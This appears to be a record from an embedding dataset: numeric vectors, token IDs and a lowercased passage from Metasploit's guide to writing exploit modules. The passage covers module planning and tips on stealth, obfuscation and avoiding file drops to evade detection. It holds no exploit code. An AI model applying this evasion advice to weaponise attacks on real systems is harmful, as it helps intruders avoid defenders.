-0.8272293210029602, -0.4000091552734375, 0.5596383213996887, 0.06871544569730759, 0.24977314472198486, -0.4160505533218384, -0.12693996727466583, -0.36342769861221313, 0.3511030375957489, 0.4983885586261749, -0.45536160469055176, 1.159472942352295, 0.20799994468688965, 0.08916716277599335, -0.6615169048309326, -0.0876232236623764, -1.049303650856018, -0.7795975208282471, -0.07603441178798676, 0.3930497169494629, 0.6545093655586243, 0.3493998944759369, 1.734296441078186, 0.2649705708026886, 0.6340331435203552, -0.8483401536941528, 0.06834691017866135, 0.390907347202301, -0.13653947412967682, 0.6375186443328857, 1.3011283874511719, -0.08654800802469254, 0.11505912989377975, -0.6479147672653198, -0.6804505586624146, -0.34829017519950867, 0.1312822699546814, 0.7900875806808472, -0.34354138374328613, 0.8287665247917175, -0.4909409284591675, -0.6739298105239868, 0.11950986832380295, -0.32465240359306335, -0.19475188851356506, 0.6679906249046326, 0.05185767263174057, 0.5862606167793274, -0.2821817100048065, -1.0772541761398315, 0.5055857300758362, -0.3602777123451233, 0.3519326150417328, 0.6370422840118408, 0.14198695123195648, -1.27825927734375, 0.0038344371132552624, -0.4884306490421295, -0.3213490843772888, 0.06715527921915054, -0.36977624893188477, 0.2435450255870819, -0.7370287179946899, -0.46359768509864807, -0.5415604710578918, 1.0830798149108887, 0.6423867344856262, 0.5890610814094543, -0.25849252939224243, 0.17689673602581024, -0.15597222745418549, -0.15708458423614502, 0.2999957799911499, 0.4741423726081848, -0.024637486785650253, -0.7342458367347717, 0.9424437284469604, 0.9666982889175415, 0.05028301477432251, 0.44971293210983276, 0.6119588017463684, -0.004717769101262093, 1.0503028631210327, -0.3796098232269287, -0.7550709247589111, -1.3333383798599243, -0.09928465634584427, 0.8179788589477539, 0.30646881461143494, -0.7606745362281799, -0.1657768189907074, -0.9019697904586792, 0.21253341436386108, 0.5768324136734009, -1.3501931428909302, -0.12561483681201935, -0.22084468603134155, -0.43888533115386963, 0.7863266468048096, -0.33215317130088806, -0.7417985796928406, 0.11568567156791687, -0.42135146260261536, -1.0441395044326782, 0.690270721912384, 0.5404918789863586, 0.06300672143697739, 0.13042308390140533, -0.6226919889450073, 0.3824843466281891, 0.0346013568341732, -0.5045493245124817, -0.47943681478500366, -0.4449894428253174, 0.5930764675140381, 0.27958667278289795, 0.3734716773033142, 0.5109701752662659, -0.016814589500427246, 0.27428123354911804, -0.43172380328178406, 0.014313405379652977, -0.5173618793487549, 0.7911785840988159, -0.23775258660316467, 0.500782310962677, 0.2222190499305725, 0.2123226523399353, 0.3949204683303833, 0.5823142528533936, -0.173125758767128, 0.3862634301185608, -1.086492657661438, -0.6650353670120239, -0.14068205654621124, 0.305428683757782, -0.8106928467750549, 1.3035590648651123, 0.09880080074071884, -0.8630942702293396, 0.498654842376709, 0.6806173324584961, 0.06299000978469849, 0.7466871738433838, -1.010668396949768, 0.8283423781394958, 0.541537344455719, 0.15883851051330566, 0.5000253319740295, -0.8246109485626221, 0.45334088802337646, -0.054681554436683655, 0.324095219373703, -1.4085705280303955, -0.8721171021461487, -0.6758298873901367, 0.15329298377037048, 0.249082550406456, 0.5797528028488159, -0.2132440209388733, -0.572361171245575, -0.35788097977638245, -0.08736486732959747, 0.024961503222584724, -0.5226717591285706, -0.7356051802635193, -0.677982747554779, 0.6212953925132751, 0.01498397532850504, 0.20506659150123596, 0.5074481964111328, -0.4440659284591675, -0.27683112025260925, -0.6664994359016418, 0.19878916442394257, -0.627983570098877, -0.38103270530700684, 0.683057963848114, 0.31582775712013245, -0.9253367185592651, 0.3200964033603668, -0.22048239409923553, 0.4625520408153534, 0.5043670535087585, 0.031580064445734024, 0.43203216791152954, -0.5919548273086548, -0.9599215984344482, 1.1545515060424805, -0.2404194325208664, -1.2053958177566528, -0.15512092411518097, -0.7089506983757019, 0.3232085704803467, 0.6311197280883789, -0.018619738519191742, -0.9344725012779236, -1.1252920627593994, -0.7692206501960754, 0.3191680312156677, -0.43300533294677734, -0.40796634554862976, -0.38862186670303345, -0.7805656790733337, -0.1513950228691101, 0.9287106990814209, 0.5868600010871887, -1.3545297384262085, 0.42036736011505127, -0.22050119936466217, 0.7476083636283875, -0.8012614846229553, 0.24790707230567932, 0.5997864603996277, -0.3603825569152832, -0.6145032048225403, 0.9497460126876831, -0.1946796476840973, 0.3971874713897705, -0.5458163022994995, 0.909403383731842, 0.21662110090255737, 0.2960013747215271, -0.3923191726207733, 0.22642630338668823, -0.17494070529937744, 0.24044370651245117, -0.3987436592578888, 0.4525837004184723, -0.39591875672340393, -0.01841443032026291, -0.0028284620493650436, 0.7709757089614868, -0.390099436044693, 0.41586118936538696, -0.5908636450767517, 0.2298959344625473, 0.35795459151268005, -0.4899231493473053, 0.9835787415504456, -0.11297820508480072, 0.6484108567237854, 0.05669846758246422, -0.5601761341094971, 0.35281234979629517, 0.20600146055221558, -0.5401356816291809, -0.6043754816055298, -0.20990315079689026, -0.3522997796535492, 0.5255349278450012, -0.15994539856910706, 0.07285650819540024, 0.5354324579238892, -0.552433967590332, 0.15424524247646332, 0.8920041918754578, 0.47762033343315125, 0.920828640460968, -1.1828713417053223, 0.2773361802101135, 0.3768870532512665, 0.2750709652900696, 0.6108388900756836, 0.3334943652153015, -0.9191391468048096, -0.14256598055362701, 0.06115060672163963, -0.653315544128418, -1.0816951990127563, -0.03935850039124489, 0.6318004131317139, -0.017053045332431793, 0.09757891297340393, -0.10888182371854782, -0.7159994840621948, -0.4724200963973999, 0.7999705076217651, 0.6616004109382629, 0.5589470267295837, 0.3049943745136261, 0.4439648389816284, 0.04404696449637413, -0.7138633728027344, -0.3219197690486908, -0.1076524555683136, -0.1333954781293869, 0.8125176429748535, 0.6483475565910339, -0.32161545753479004, 0.40618929266929626, 0.7840954065322876, -1.1238757371902466, -1.2318493127822876, -1.318585753440857, 0.41429394483566284, -0.3079591393470764, -0.4813750088214874, -0.5223294496536255, -0.24921390414237976, 0.0191593486815691, 0.9814647436141968, 0.75081866979599, -0.7140302658081055, -0.22256319224834442, -0.13935910165309906, -0.9314180612564087, 0.4220162034034729, 0.06696421653032303, 0.16832585632801056, -0.18921081721782684, -0.9759889245033264, -1.2906525135040283, 0.031115811318159103, -0.7938218712806702, 0.12944556772708893, 1.2584121227264404, 0.7168988585472107, 0.3174894154071808, 0.4876977801322937, 0.24349310994148254, 0.17948168516159058, 0.06251432001590729, 0.0709085613489151, 0.5537294149398804, -0.5821439027786255, -0.3942299783229828, 0.3064635992050171, -0.26845166087150574, -0.07005611062049866, 0.693297266960144, -0.1717970073223114, -0.11649473756551743, 0.49129781126976013, -0.10495102405548096, 0.14975838363170624, -0.4687362015247345, 0.32121309638023376, -0.8568131923675537, -0.28968220949172974, -0.3835430443286896, 0.04050930216908455, -0.42495444416999817, -0.2748624384403229, 0.052875034511089325, -0.9703339338302612, -0.4738352298736572, 1.1244111061096191, 0.046739738434553146, -0.7607072591781616, -0.6303891539573669, 0.03301914036273956, -1.0949517488479614, -0.9909504652023315, -0.967383086681366, -0.0971650704741478, -0.2115781158208847, -0.18577036261558533, 0.020444171503186226, -0.11287851631641388, -0.42477619647979736, -0.11538075655698776, 0.40064117312431335, 0.6305558681488037, -0.025290992110967636, -0.1368325799703598, 0.1412660926580429, 0.10406674444675446, -0.27595970034599304, 0.38213080167770386, 0.13102516531944275, 0.06261467933654785, 1.1005609035491943, -0.5366227030754089, 0.08487256616353989, -0.08079538494348526, 0.07911548018455505, 0.2863529324531555, -0.10914692282676697, -1.3972845077514648, -0.3292008638381958, -0.4610547125339508, -0.23660823702812195, -0.0707038938999176, -0.1067238375544548, 0.3348037600517273, -0.13449248671531677, -0.20850174129009247, -0.4500778913497925, 0.563445508480072, -0.002826065057888627, -0.08299539238214493, 0.3695043623447418, 0.4801269769668579, 1.015882968902588, 0.12327336519956589, -0.037961553782224655, 0.9819819331169128, -0.4878600835800171, 0.3213806748390198, -0.3797697424888611, 0.65520840883255, -0.11073943227529526, 0.8051037788391113, -0.25346145033836365, 0.5887149572372437, -0.4213203489780426, 0.16407382488250732, -0.07329542934894562, 1.1260677576065063, 0.5011519193649292, -0.533907413482666, -0.24449138343334198, -0.48726335167884827, 0.12309063971042633, -0.13129517436027527, -1.2272417545318604, -0.34275510907173157, 0.18501444160938263, -0.3616757094860077, 0.30569013953208923, -0.578879177570343, 0.14115411043167114, -0.04666877165436745, 0.16202010214328766, 0.14211054146289825, -0.6370811462402344, -0.90868079662323, 0.4446698725223541, 0.6530837416648865, -0.6185690760612488, -0.4205564558506012, 0.36896318197250366, -0.14197483658790588, 0.04211895912885666, -0.5552151203155518, -0.6218501925468445, 0.49826011061668396, 0.10323750972747803, -0.7196119427680969, 0.03689273074269295, 0.13090194761753082, 0.0023395041935145855, 0.00021943449974060059, -0.4075597822666168, 0.04499180614948273, -0.7692067623138428, 0.3783634305000305, -0.22356511652469635, -0.008498599752783775, -1.1227407455444336, -0.060148172080516815, -0.36478859186172485, 0.30206742882728577, -0.1807623952627182, 0.479265958070755, 0.2689443826675415, 0.7290276288986206, 0.5768457651138306, -0.2965354323387146, 0.6357849836349487, -0.4581124484539032, 0.1562759131193161, 0.6090641617774963, 0.9629401564598083, 0.23974217474460602, 0.7418299317359924, 0.082633376121521, 0.40866735577583313, -0.03291887044906616, 0.2883547842502594, -0.5645911693572998, -0.23436863720417023, -0.6074790954589844, -0.9677244424819946, -0.19932879507541656, 0.19697368144989014, 0.050284337252378464, -0.048357781022787094, -0.1443803757429123, 0.26752135157585144, -0.3847770094871521, 0.5412362217903137, -0.521629273891449, -0.6171291470527649, 0.6516675353050232, -1.3140639066696167, 0.2055501490831375, 0.4254434108734131, -0.7376561164855957, 1.0043752193450928, 0.5912725925445557, 0.004260318819433451, 0.8220120072364807, 1.0145379304885864, 0.3971359431743622, 0.42338868975639343, 0.2987631857395172, 0.8681219816207886, 0.2787186801433563, -0.3830835819244385, 0.22950784862041473, -0.1810314953327179, 0.3578219711780548, -0.4559645354747772, 0.21906642615795135, -0.10470347851514816, -0.35386884212493896, 0.09007188677787781, 0.12123791873455048, 0.21507564187049866, -0.3950675427913666, -0.3192671239376068, -1.5405035018920898, -0.06964145600795746, -0.362987756729126, 0.4007852077484131, 0.6358866095542908, 0.199302077293396, -1.4997804164886475, 0.8878408074378967, 0.25252848863601685, 0.6004207730293274, 0.46519848704338074, 1.1059672832489014, -0.13646747171878815, 0.7294334173202515, 0.3033587634563446, -0.5176800489425659, -0.2043730914592743, 0.13058963418006897, -0.056792259216308594, -0.4578360617160797, 0.6462175250053406, -0.48510560393333435, 0.2534015476703644, -0.15753138065338135, -0.39956656098365784, 0.6150628924369812, 0.09829425066709518, -0.2781287729740143, -0.9490834474563599, 0.47121283411979675, -0.2640956938266754, -1.0111585855484009, -0.4771703779697418, 0.7846823930740356, 0.33982449769973755, 0.4189136028289795, 0.08227402716875076, 0.10011941939592361, -0.6479709148406982, 0.22540494799613953, -0.40485721826553345, 0.39787203073501587, -0.030147206038236618, -0.18963749706745148, -0.1418694257736206, -0.4478127658367157, 0.47547757625579834, -0.2997441291809082, -0.5656983256340027, -0.3009719252586365, 0.6522722244262695, -0.2690947353839874, 0.4175151586532593, 0.07590701431035995, -0.9976888298988342, -0.027466701343655586, 0.5642020106315613, 0.7976946830749512, 0.35826438665390015, 0.6223961114883423, 0.46355941891670227, -0.14338532090187073, -0.15942692756652832, 0.49016788601875305, 0.762721598148346, 0.1577012687921524, -0.4107249081134796, 0.021903008222579956, -0.23362958431243896, -0.3574052155017853, -0.8156362771987915, -0.23219168186187744, 1.1285215616226196, -0.3063269555568695, -0.41550737619400024, -0.0805504098534584, -0.26139089465141296, -1.0274113416671753, -0.5462406277656555, -1.0095455646514893, -0.012229940854012966, -0.3034793734550476, -0.5327664017677307, 0.5613142848014832, -1.1475024223327637, 3.8258767127990723, 0.7342617511749268, 0.9427024722099304, -0.41848671436309814, -0.1831228882074356, 0.8594455718994141, -0.5808388590812683, 0.31413769721984863, -0.23632928729057312, 0.1543094515800476, 0.09825664758682251, -0.5302459597587585, -0.3572040796279907, 0.9960448145866394, 0.29189932346343994, 0.46626025438308716, -1.0761662721633911, -0.18709796667099, -0.6405379176139832, -1.0455600023269653, -1.2484644651412964, 0.5683448910713196, -0.1490817666053772, 0.2175620049238205, -0.3210057020187378, 0.6369802951812744, -0.08731468766927719, -0.6310979723930359, 0.1250455528497696, -0.9251691102981567, 0.8924641609191895, 0.44726088643074036, 0.8198946714401245, -0.32495617866516113, 0.16573631763458252, 0.2686789631843567, -0.46958354115486145, -0.34226056933403015, 0.28951072692871094, -0.45260047912597656, 0.6877003312110901, -0.3905971646308899, -0.4644686281681061, -0.18367257714271545, -0.14035046100616455, 0.4678892195224762, -0.8716557025909424, 0.629993200302124, -0.48152974247932434, -0.4071010649204254, 0.6648033261299133, 0.4540136754512787, 0.7557536363601685, -0.6668092608451843, -0.7976666688919067, -0.040268801152706146, 0.34500351548194885, -0.14712756872177124, 0.23313331604003906, -0.20860536396503448, 0.12541882693767548, 0.34668537974357605, -0.4151279032230377, 0.931283712387085, -0.03465738147497177, -0.15455204248428345, -0.44695615768432617, 0.7152596712112427, -0.2551741898059845, 0.13457971811294556, -0.2816781997680664, 0.5610581040382385, -0.19819669425487518, -0.7410610318183899, 0.06098516657948494, 0.010309332050383091, -0.18237191438674927, -0.15394677221775055, 0.49666064977645874, -0.4750347435474396, -0.3251950740814209, -0.005646666046231985, -0.33890336751937866, -1.0391861200332642, 0.412689208984375, 0.27925804257392883, -0.27611270546913147, -0.43203499913215637, 0.5088075399398804, 0.2886953055858612, 0.8204157948493958, 0.672755241394043, -0.4229084849357605, 0.10017333924770355, 0.344971239566803 ]
[ 2023, 2003, 1037, 2919, 2801, 1010, 2138, 2087, 3497, 2017, 1521, 2128, 12040, 3436, 2060, 10231, 2017, 2123, 1521, 1056, 13566, 2000, 2689, 1010, 1998, 1013, 2030, 2017, 1521, 2128, 2763, 4851, 2149, 2000, 13590, 2060, 14203, 10797, 2381, 2043, 2045, 2069, 3791, 2000, 2022, 2028, 10797, 1012, 4283, 2005, 8020, 2115, 11336, 2000, 1996, 2451, 1010, 2021, 2053, 4283, 2000, 2115, 4689, 10797, 2381, 1012, 2061, 2004, 1037, 10427, 1010, 2043, 2017, 2215, 2000, 2191, 2242, 2047, 1010, 2030, 2689, 2242, 1010, 4088, 2007, 1037, 2047, 3589, 2008, 1521, 1055, 2039, 2000, 3058, 2000, 3040, 1012, 2034, 2125, 1010, 2191, 2469, 2017, 1521, 2128, 2006, 3040, 1012, 2065, 2017, 2079, 1037, 21025, 2102, 3570, 2009, 2097, 2425, 2017, 2054, 3589, 2017, 1521, 2128, 2747, 2006, 1024, 1002, 21025, 2102, 3570, 1001, 2006, 3589, 13909, 1011, 3040, 2498, 2000, 10797, 1010, 2551, 14176, 4550, 7929, 1010, 2085, 2079, 1037, 21025, 2102, 4139, 2000, 8816, 1996, 6745, 3431, 2013, 18804, 13102, 4135, 4183, 1024, 1002, 21025, 2102, 4139, 2525, 2039, 1011, 2000, 1011, 3058, 1012, 2012, 2023, 2391, 1010, 2017, 1521, 2128, 3201, 2000, 2707, 1037, 2047, 3589, 1012, 1999, 2023, 2553, 1010, 2057, 1521, 2222, 2171, 2256, 2047, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1024, 1002, 21025, 2102, 4638, 5833, 1011, 1038, 2026, 1035, 12476, 1035, 11336, 7237, 2000, 1037, 2047, 3589, 1005, 2026, 1035, 12476, 1035, 11336, 1005, 1998, 2059, 2017, 2064, 2175, 3805, 1998, 5587, 2008, 11336, 1012, 2191, 2469, 2009, 1521, 1055, 1999, 1996, 6413, 4130, 1024, 1002, 21025, 2102, 5587, 1031, 11336, 4130, 1033, 2043, 2017, 5630, 2000, 3828, 1996, 3431, 1010, 10797, 1006, 2065, 2045, 1521, 1055, 2069, 2028, 11336, 1010, 2017, 2064, 2079, 21025, 2102, 10797, 1011, 1037, 2205, 2061, 2017, 2123, 1521, 1056, 2031, 2000, 2828, 1996, 11336, 4130, 1012, 3602, 1011, 1037, 2428, 2965, 2673, 1007, 1024, 1002, 21025, 2102, 10797, 1031, 11336, 4130, 1033, 2043, 2017, 1521, 2128, 2589, 1010, 5245, 2115, 3431, 1010, 2029, 2097, 2039, 11066, 2115, 3642, 2000, 2115, 6556, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1012, 2017, 2442, 5245, 2115, 3431, 1999, 2344, 2000, 12040, 1996, 4139, 5227, 1010, 2030, 3745, 2009, 2007, 2500, 2006, 1996, 4274, 1012, 1002, 21025, 2102, 5245, 4761, 2026, 1035, 12476, 1035, 3589, 7604, 3126, 2140, 1013, 3392, 1013, 3040, 1013, 14184, 1013, 9830, 3126, 2140, 1013, 1038, 4135, 2497, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 9830, 1012, 21144, 3126, 2140, 1013, 1038, 4135, 2497, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 9830, 1013, 26221, 1012, 21144, 102 ]
metasploit
112.txt
3
[CLS] on this pageplan your modulerankingtemplatebasic git commandsreferencesthe real kung - fu behind exploit development isn ’ t actually about which language you choose to build it ; it ’ s about your precise understanding of how input is processed by the application you ’ re debugging, and how to gain control by manipulating it. that ’ s right ; the keyword is β€œ debugging. ” your binjitsu ( reverse - engineering ) is where the real kung - fu is. however, if your goal isn ’ t just about popping a calculator, but actually want to weaponize, to maintain, and to provide use in the practical world, you need a development framework. and this is where metasploit comes in. it ’ s a framework that ’ s free and open - source, actively contributed by researchers around the world. so when you write a metasploit exploit, you don ’ t have to worry about any dependency issues, or having the wrong version, or not having enough payloads for different pentesting scenarios to choose from, etc. the idea is all you need to do is focus on building that exploit, and nothing more. plan your modulefirst, ask yourself will exploiting this vulnerability result in executing a payload? if not, then despite exploiting a vulnerability, for metasploit ’ s purposes the module would fall into the auxiliary category. unlike writing a proof - of - concept, when you write a metasploit module, you need to think about how users might use it in the real world. stealth is usually an important element to think about. can your exploit achieve code execution without dropping a file? can the input look more random, so it ’ s more difficult to detect? how about obfuscation? is it generating unnecessary traffic? can it be more stable without crashing the system? try to be precise about exploitable requirements. usually, a bug is specific to a range of versions or even builds. if you can ’ t automatically check that, you need to at least mention it in the description somewhere. some of your exploit ’ s techniques might also be application - specific. for example, you can take advantage of a specific behavior in the application to generate heap allocations the way you want, but maybe it ’ s noisier in the newer version, so that gives you some stability issues. does it need a 3rd - party component to work that may not even be installed by everyone? even if it is,
[ -0.07074501365423203, -0.5099145174026489, -0.2510295510292053, 0.1075267568230629, -0.6707320213317871, -0.29979944229125977, -0.5380197167396545, 0.4636704623699188, -0.1215134933590889, 0.7048096656799316, 0.3557421565055847, 0.13895989954471588, 0.42726418375968933, -0.638146698474884, 0.33110034465789795, 0.4062945246696472, -0.43331101536750793, -0.44817641377449036, -1.3092408180236816, 0.19518470764160156, 0.5782480835914612, -0.6797736287117004, -0.5820792317390442, -0.11659543216228485, -0.16960911452770233, 0.74219810962677, 0.08338991552591324, -0.5895691514015198, 0.3139113187789917, 0.3627023994922638, 0.24709029495716095, -0.003131489735096693, 0.3110867440700531, -0.7205404043197632, -0.0068133012391626835, -0.42433634400367737, 0.6172249913215637, -0.33846965432167053, 0.17195577919483185, -0.33547112345695496, 0.7100158333778381, -0.08313027024269104, -0.10839772969484329, -0.422781765460968, -0.7015761137008667, -0.07581709325313568, 0.2794782519340515, -0.6525379419326782, 1.192623257637024, -0.12665382027626038, 0.782572329044342, 0.5237618088722229, 0.09195998311042786, 0.5980179309844971, -0.32993602752685547, -0.12274149805307388, 0.2789372503757477, 0.36883825063705444, 0.1612522453069687, 0.2853405773639679, -0.019259871914982796, 0.3848464787006378, 0.3541679084300995, -0.779728889465332, -0.06884674727916718, 0.35543328523635864, 0.5507667064666748, 0.1069682165980339, 0.2112865298986435, -0.5222199559211731, 0.26759588718414307, 0.5150173306465149, -0.6621289253234863, -0.736182451248169, -0.6482372879981995, 0.0012376683298498392, 1.0063217878341675, 0.048152223229408264, -0.36511358618736267, 0.5056332945823669, -0.06221398711204529, 0.3982597887516022, 0.48158708214759827, -0.07048866152763367, -0.4491642117500305, 0.14894501864910126, 0.4107182025909424, 0.16942429542541504, -0.5925388336181641, -0.03228696808218956, 0.8553345203399658, 0.23781272768974304, -0.3163870573043823, 0.36437591910362244, 0.7234991788864136, 0.3533262610435486, -0.19189314544200897, 0.264902263879776, -0.018531447276473045, 0.2985474169254303, 0.6027325987815857, 0.4591125547885895, 0.361248254776001, 0.3792514503002167, -0.17774398624897003, 0.17239420115947723, 0.4430396854877472, -0.421834260225296, 0.34831252694129944, -0.36827296018600464, 0.6634869575500488, 0.1758182793855667, -0.3781421184539795, -0.8356817364692688, -0.10959498584270477, -0.21157589554786682, 0.06685271859169006, 0.23104256391525269, 0.215735524892807, 0.5655268430709839, -0.31092482805252075, -0.2519591748714447, 0.28962239623069763, 0.42908334732055664, 0.7030984163284302, 0.07464054226875305, 0.5294412970542908, 0.35521090030670166, 0.10746550559997559, -0.2242092490196228, -0.5579119324684143, -0.23912915587425232, 0.2475762814283371, 1.3819822072982788, -0.697754979133606, 0.17555610835552216, -0.191075399518013, 0.3885141611099243, 0.8784136176109314, -1.006567358970642, 0.3329277038574219, 0.008765759877860546, 0.22848929464817047, 0.7960143685340881, 0.5543597936630249, -0.3132375180721283, -0.14976286888122559, -0.5598741769790649, 0.05957552045583725, 0.926069974899292, -0.41448864340782166, -0.7944897413253784, 0.24166397750377655, -0.12142731249332428, -0.03518052026629448, 0.6024995446205139, -0.4398214519023895, 0.8141226768493652, 0.24398919939994812, 0.0026064380072057247, 0.010778628289699554, 0.6718342304229736, -0.20632433891296387, 0.532607913017273, -0.35856950283050537, 0.2992306351661682, -0.7243925333023071, -0.5335204005241394, -0.4226589798927307, -0.11331047862768173, 0.3726668357849121, -0.39492613077163696, -0.08597712963819504, -0.09711742401123047, 1.3545688390731812, 1.2227755784988403, 0.2092498242855072, 0.180185928940773, 0.34519898891448975, 0.40882280468940735, -1.1666072607040405, 0.6190800666809082, 0.23053078353405, 0.46845805644989014, -0.0527181513607502, 0.44031935930252075, -0.4235305190086365, -0.5191367268562317, 0.4143068492412567, -0.09667932242155075, -0.010566738434135914, 0.5408858060836792, -0.27907344698905945, 0.016353167593479156, 0.08047650754451752, 0.08978036046028137, -1.1859686374664307, 0.32368290424346924, -1.1271430253982544, -1.1871769428253174, 0.07605841010808945, -0.11881284415721893, 0.02862483263015747, 0.602992832660675, -0.13405151665210724, -0.31418517231941223, 0.582331657409668, 0.3308030366897583, -0.8161590099334717, 0.6020583510398865, 0.839102029800415, -0.311041921377182, -0.11421782523393631, -0.323591947555542, -0.4499037265777588, -0.3399610221385956, -0.8929175138473511, 0.6957579255104065, -0.6942980289459229, 0.6137187480926514, 0.051580291241407394, 0.5240968465805054, 0.3955151438713074, 0.15533369779586792, 0.3642922639846802, -0.6675736308097839, -0.039493367075920105, 0.3788904547691345, -0.28129392862319946, -0.394036203622818, -0.28170764446258545, 0.6522349119186401, 0.03682602196931839, 1.041459083557129, -0.2348126620054245, -0.8643225431442261, 0.7288687825202942, 0.39294862747192383, 0.2445189356803894, -0.04679521173238754, 0.2050078958272934, 0.5822590589523315, 0.04981502890586853, 0.11310897022485733, 0.7920467257499695, 0.5485101342201233, -0.09601160138845444, -0.19928887486457825, 0.44643378257751465, 0.013389091938734055, -1.030614972114563, 1.0133769512176514, -0.43126770853996277, -0.2971965968608856, -0.507114052772522, -0.746774435043335, 0.21151256561279297, 1.1072654724121094, -1.044933557510376, -0.6123990416526794, 0.20233623683452606, -0.194945827126503, -0.5961622595787048, -0.5114834904670715, -0.06721729785203934, 0.46707025170326233, -0.5406932234764099, -0.2197655439376831, -0.26391223073005676, -0.5557949542999268, -0.5057002305984497, -0.09373456239700317, -0.35253480076789856, -0.3503248691558838, -0.4762839674949646, 0.32965874671936035, 0.04914744943380356, -0.5010462403297424, 0.31221529841423035, -0.4206721782684326, -0.476234495639801, -0.24067480862140656, 0.2922521233558655, 0.3243047297000885, 0.3555847406387329, -0.07265759259462357, -0.3432760238647461, -0.07837766408920288, -0.06385526806116104, 1.205519199371338, 0.0676480084657669, -0.3360646069049835, 0.11231209337711334, -0.24291139841079712, 0.08303965628147125, -0.1953231543302536, 0.6297239065170288, -0.3128913640975952, 0.2687644064426422, 0.1150621622800827, 0.1151784136891365, 0.011807825416326523, 0.8125718235969543, -0.25342121720314026, -0.07480055838823318, 0.10195908695459366, -0.32059037685394287, -0.07029132544994354, 0.36897948384284973, 0.3182150721549988, -0.9237399697303772, 0.5653746724128723, -0.14538590610027313, 0.358120322227478, -0.8194534778594971, 0.11497185379266739, 0.2452993094921112, 0.0453130342066288, -0.710504949092865, -0.9814300537109375, -0.08346454054117203, -0.03514339029788971, 0.1316860169172287, 0.18399368226528168, -0.24460898339748383, 0.6045371890068054, 0.4637816250324249, -0.8078476786613464, 0.561079204082489, 0.04759897291660309, -0.06286358088254929, -0.014316584914922714, -0.6066468954086304, 0.7622641324996948, 0.33687305450439453, -0.14756159484386444, -0.6311937570571899, -0.31378883123397827, -0.0254061259329319, -0.10439211875200272, 0.6075888872146606, -0.4492834806442261, 1.2357527017593384, 0.02504180371761322, -0.14639858901500702, 1.190024495124817, 0.12670466303825378, -0.6102437376976013, -0.3630361258983612, 0.3118112087249756, -0.5018332600593567, -0.05009549856185913, 0.5541856288909912, 1.2046895027160645, -0.026068376377224922, 1.0583831071853638, -0.10375886410474777, -0.022997060790657997, -0.01023910939693451, 0.14971253275871277, 0.3511141836643219, -0.12407618761062622, -0.6743744611740112, -0.12251418083906174, -0.18049854040145874, -0.2567981779575348, -0.4701046049594879, 0.19738741219043732, 0.21850793063640594, -0.22092242538928986, 0.6196739673614502, -0.2078367918729782, -0.030649544671177864, 0.8386119604110718, 0.21063563227653503, -0.4823499619960785, 0.3792979121208191, -0.05957608297467232, 0.40602031350135803, -0.0720905289053917, 0.37970682978630066, 0.26157790422439575, 0.25886523723602295, 0.11728040874004364, 0.2819298505783081, -0.4223625659942627, -0.5283081531524658, -1.002753496170044, -0.5336366295814514, -0.5192018151283264, -0.9513605237007141, 0.4133364260196686, 0.7683495283126831, -0.6946845650672913, -0.7395032048225403, -0.7102283835411072, 0.5572501420974731, 0.6147148609161377, 0.8235455751419067, 0.3482007384300232, 0.1787334531545639, -0.25218793749809265, -0.570760190486908, 0.4774412214756012, -0.15114456415176392, -0.10019097477197647, 0.23840545117855072, 0.7313283085823059, -0.5674499869346619, 0.5034452676773071, 0.30195125937461853, 0.15380823612213135, -0.417535662651062, -0.0154575789347291, -0.38717368245124817, -0.36140450835227966, 0.03766316547989845, 0.34319764375686646, 0.10134626179933548, -0.058780524879693985, -0.5857834815979004, -0.6003842949867249, -0.658340334892273, 0.1315363496541977, 0.7296918630599976, -0.7780707478523254, -0.7864865660667419, -0.7144656777381897, -0.523563802242279, -0.1508370190858841, 0.521895706653595, -0.0665954053401947, -0.49430587887763977, -0.4616583585739136, -0.9879634380340576, -0.4813461899757385, 0.12842559814453125, 0.5531080365180969, -0.19543229043483734, -1.2497285604476929, 0.09155433624982834, 0.022758865728974342, -0.44252195954322815, -0.6136465668678284, 0.15076278150081635, 0.19971539080142975, 0.21930736303329468, 0.47164231538772583, -0.823244035243988, -0.7032630443572998, 0.4012604057788849, -1.0255659818649292, 0.6272759437561035, -0.5242992043495178, -0.08113212883472443, -0.19446739554405212, 0.30098438262939453, 0.0380132794380188, -0.013323369435966015, -0.6855955123901367, -0.1302337348461151, -0.48637667298316956, 0.17895984649658203, -0.8757122159004211, -0.012691643089056015, 0.23477458953857422, -0.2989653944969177, -0.8167021870613098, 0.8380521535873413, 0.17560270428657532, -0.05954346805810928, 0.4422074258327484, -0.4359985888004303, -0.5088227987289429, 0.3266392648220062, -0.778907060623169, 0.3305266201496124, -0.06255638599395752, -0.11089345812797546, -0.23945163190364838, -0.23290720582008362, 0.7317115068435669, 0.3458894193172455, 0.3611679673194885, -0.5205020904541016, -0.45021775364875793, 0.02855832502245903, 0.7111589908599854, -0.038402486592531204, 0.26960083842277527, 0.010988903231918812, -0.47731533646583557, -0.3151211142539978, 0.04391256347298622, -0.7986809015274048, -0.45875638723373413, 0.1841755211353302, -0.2016400843858719, 0.11565655469894409, 0.3651357889175415, 0.0012002501171082258, 0.023220928385853767, -0.060488469898700714, 0.07438571751117706, -0.5379239320755005, 0.4990765154361725, -0.4990638792514801, 0.5735674500465393, -1.076607584953308, 0.9599634408950806, -0.7816054224967957, 0.07900017499923706, -0.654381275177002, 0.0703355073928833, -0.05941743403673172, 0.12358854711055756, 0.6747982501983643, -0.3925151526927948, -0.9333190321922302, 1.0287840366363525, 0.14254677295684814, -0.3725685775279999, -0.041233643889427185, 0.5863272547721863, -0.6108294129371643, -0.23961685597896576, 0.1903901994228363, -0.23194652795791626, -0.8346338272094727, -0.10962054133415222, 0.11850287020206451, -0.407347708940506, 0.07945846766233444, -1.091684341430664, -1.1003105640411377, -0.029428208246827126, 0.20191849768161774, 0.06402987241744995, -1.223456621170044, -0.13221445679664612, -0.15042397379875183, 0.3778713345527649, 0.11480294913053513, -0.8343724608421326, 0.07769977301359177, -0.5954896807670593, -0.11589954793453217, 0.5540044903755188, 0.08148487657308578, 0.3975452184677124, -0.3888312876224518, -0.15122389793395996, 0.2876700162887573, 0.4740787446498871, -0.2037966549396515, -0.6742330193519592, 0.44874781370162964, -0.010944611392915249, -0.3859557807445526, 0.676554262638092, -0.15228402614593506, 0.6576105952262878, 0.07317604869604111, 0.6222818493843079, -0.09369653463363647, -0.007439322769641876, -0.701973557472229, -0.31820785999298096, 0.33431535959243774, 